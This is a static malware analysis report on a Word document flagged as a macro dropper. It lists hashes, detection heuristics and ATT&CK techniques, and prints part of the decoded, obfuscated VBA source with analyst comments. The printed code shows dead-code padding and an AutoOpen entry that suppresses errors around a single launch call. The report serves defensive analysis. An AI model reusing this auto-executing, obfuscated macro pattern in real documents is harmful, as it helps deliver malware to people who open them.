Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 b0669550c575436e…

MALICIOUS

Office (OLE)

169.5 KB Created: 2018-04-26 14:33:00 Authoring application: Microsoft Office Word First seen: 2018-06-14
MD5: 4e1e48b41696481c4cb245140293ef0e SHA-1: 4540a8fa774d2e982ba879de799750d66c52e6c4 SHA-256: b0669550c575436e5a44c93a038c43a8721e77bba685d60d5cef7b8dc523a17f
202 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing obfuscated VBA macros. The presence of a Shell() call and the ClamAV detection signature 'Doc.Dropper.Agent-6519200-0' strongly indicate that the macros are designed to download and execute a secondary payload. The AutoOpen macro further suggests an immediate execution upon opening the document, typical of a malicious attachment.

Heuristics 6

  • ClamAV: Doc.Dropper.Agent-6519200-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6519200-0
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence of a legacy Word macro execution surface; by itself it is not an attribution to a downloader family or to a parser CVE.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 52793 bytes
SHA-256: ce1a15875c8cc653a71324b50de18f3fe93825b77dbc27dd671f962fd0ece23d
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "zfAnnQJJ"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Analyst note: module header as decoded by olevba. VB_Base = "1Normal.ThisDocument"
' together with VB_PredeclaredId = True identifies this as the document's
' ThisDocument class module, exported under a randomised name ("zfAnnQJJ").
' No "Option Explicit" line appears in the decoded listing, so every undeclared
' name used in the procedures below is an Empty Variant by VBA's default rules -
' which is what makes the repeated Select Case filler blocks unreachable.
' Analyst note: filler procedure. None of the names used inside (uYTbtR, jjAso,
' fitRDB, iPfwOQ, LiCYs, IPDvCn) is assigned anywhere in the decoded listing, and
' UFuwFI itself is not called from the visible (truncated) portion. With no Option
' Explicit in scope these names are Empty Variants, so neither Case value (25512,
' 46232) can match and both branches are expected to be dead code. The same
' template recurs in cJDwHs, PjuzRS, fIsiz, HHPam and nQDzR and on both sides of
' the one real call in Autoopen - a padding/randomisation obfuscation pattern,
' not functional logic. The parameter BwdcBR is never read.
Sub UFuwFI(BwdcBR)
Select Case uYTbtR
         Case 25512
            avkpk = Hex(jjAso - ChrW(fitRDB))   ' unreachable: selector is Empty
            iTYrF = CByte(72325)                ' would overflow a Byte if ever executed
            IjFNZ = iPfwOQ
         Case 46232
            VPckMi = LiCYs
            ilBEi = Round(6749)
            AzanS = Log(IPDvCn)                 ' Log of an unassigned name; never reached
End Select
End Sub
' Analyst note: three copies of the same dead-code filler template seen in
' UFuwFI. Each Select Case tests a name (ivdduj, QQjSv, SDTGwq) that is never
' assigned in the decoded listing, so no Case branch is expected to execute.
' cJDwHs is not called from the visible (truncated) portion and its parameter
' SwBDo is never read. Treat as obfuscation padding, not payload logic.
Sub cJDwHs(SwBDo)
Select Case ivdduj   ' selector never assigned -> no branch matches
         Case 24757
            cVooR = Hex(VpIjz - ChrW(PjZiEz))
            wtDwXw = CByte(73504)
            MmZBT = RzoPHp
         Case 56921
            cnSEDQ = WvZwzQ
            YWRpf = Round(90789)
            DjhjK = Log(jkTzHJ)
End Select
Select Case QQjSv   ' same template, different random literals
         Case 40832
            pqzEV = Hex(waRzR - ChrW(ibZEk))
            sSLmc = CByte(53946)
            oFBIqw = KXTMjd
         Case 20101
            zISVf = ajrLvv
            CMDOX = Round(30276)
            DzRbzX = Log(LHMVHN)
End Select
Select Case SDTGwq   ' same template, different random literals
         Case 25971
            JzuDr = Hex(LQzLN - ChrW(zCqrWI))
            Pbiqoh = CByte(22006)
            IkIbYU = nUhvfs
         Case 113
            PJtkuQ = bjosw
            iHFVjX = Round(4590)
            pjoIPO = Log(JacGP)
End Select
End Sub
' Analyst note: two copies of the dead-code filler template (see UFuwFI).
' Selectors NbazU and boAhB are never assigned in the decoded listing, so
' neither Select Case is expected to take a branch. PjuzRS is not called from
' the visible (truncated) portion; parameter IYnjWm is never read.
Sub PjuzRS(IYnjWm)
Select Case NbazU   ' selector never assigned -> no branch matches
         Case 95523
            ZZFci = Hex(qSJLm - ChrW(LPaKYO))
            GXRwI = CByte(73551)
            FJiAdl = YpGpU
         Case 75086
            FqPct = atmRBk
            rnIdw = Round(80802)
            zhjIi = Log(QmZUU)
End Select
Select Case boAhB   ' same template, different random literals
         Case 39026
            wDLWQ = Hex(sValhd - ChrW(imSYGG))
            sWoUSw = CByte(95555)
            brFGJ = rzmKTJ
         Case 80840
            qAsqcZ = VbbvaV
            OqEUBj = Round(89744)
            faTKnp = Log(NnzDOf)
End Select
End Sub
' Analyst note: auto-exec entry point. Word runs a procedure named AutoOpen
' (VBA names are case-insensitive) when the document is opened with macros
' enabled - this is the OLE_VBA_AUTOOPEN heuristic and ATT&CK T1059.005.
' The body is the filler template from UFuwFI wrapped around a single real call.
Sub Autoopen()
' Suppresses every runtime error in this procedure, so a failing filler
' statement or a failing stage in the payload call cannot abort execution
' before/after the call below. Also a useful hunting indicator when paired
' with AutoOpen.
On Error Resume Next
Select Case cbUYUF   ' dead-code filler: cbUYUF is never assigned
         Case 29477
            LiMPiv = Hex(wIGkH - ChrW(RXRlz))
            OnwWHw = CByte(51002)
            cAcPp = BOlwY
         Case 12724
            HoowdY = KECmU
            BqNME = Round(36887)
            hiwfr = Log(nTDlSN)
End Select
' The only statement here that is not filler. irAFOphEPzOG is not defined in the
' visible (truncated) listing and none of EHzJZd, AKWOjzER, HDYzp is assigned
' in it; presumably this is the decode/launch stage that the report's
' OLE_VBA_SHELL finding refers to - confirm against the full decoded module.
irAFOphEPzOG (EHzJZd + AKWOjzER + HDYzp)
Select Case YSKBZt   ' dead-code filler: YSKBZt is never assigned
         Case 9548
            DdqJFi = Hex(zHSjZb - ChrW(urDma))
            AiFApw = CByte(43065)
            JBMZI = AdIzUv
         Case 74662
            vFNQT = YTzmS
            zYXqU = Round(15964)
            PqGFK = Log(jLQjE)
End Select
End Sub
' Analyst note: three copies of the dead-code filler template (see UFuwFI).
' Selectors GzzbG, XSXntd and WSVJAD are never assigned in the decoded listing,
' so no branch is expected to execute. fIsiz is not called from the visible
' (truncated) portion; parameter YdJwpD is never read.
Sub fIsiz(YdJwpD)
Select Case GzzbG   ' selector never assigned -> no branch matches
         Case 35197
            MiXRpz = Hex(AmBHj - ChrW(UnAEqX))
            viCSA = CByte(4127)
            ERjjJQ = Gwlbt
         Case 301
            YrIoGK = Twslj
            jhjER = Round(75598)
            wiCRw = Log(UOqPd)
End Select
Select Case XSXntd   ' same template, different random literals
         Case 89127
            alSqza = Hex(oYQhK - ChrW(jmpoq))
            npqcjP = CByte(78543)
            zMuma = vtNPM
         Case 38769
            RjqZh = qqfhz
            nHCjI = Round(68014)
            IODcii = Log(nKmZZ)
End Select
Select Case WSVJAD   ' same template, different random literals
         Case 3011
            wVRfuj = Hex(PtJEjk - ChrW(JNDLv))
            fjDGHX = CByte(62462)
            lsiFh = Ktmzju
         Case 37525
            RdUtr = IHFpH
            RRRLXX = Round(5433)
            iAazw = Log(AQbGb)
End Select
End Sub
' Analyst note: one copy of the dead-code filler template (see UFuwFI).
' Selector zHNtba is never assigned in the decoded listing, so no branch is
' expected to execute. HHPam is not called from the visible (truncated)
' portion; parameter fVMdm is never read.
Sub HHPam(fVMdm)
Select Case zHNtba   ' selector never assigned -> no branch matches
         Case 48891
            sBtQC = Hex(ulKsj - ChrW(NHSJCq))
            JrhGA = CByte(26618)
            BrrHoA = QIGNzX
         Case 32975
            uKTzn = qoEqlB
            TKvtC = Round(41197)
            DtDDf = Log(zwMvD)
End Select
End Sub

Attribute VB_Name = "HqzXmDaAL"
' Analyst note: start of a second VBA module (randomised name) in the same
' extracted macros.bas; its contents continue past the truncated preview.
Sub nQDzR(zLUwCw)
Select Case AGQSV
         Case 67490
            cInStY = Hex(nIqcU - ChrW(BGnAj))
            BAAbG = CByte(30870)
            bzQVk = RTZfc
         Case 70352
            saKCi = hqNuT
    
... (truncated)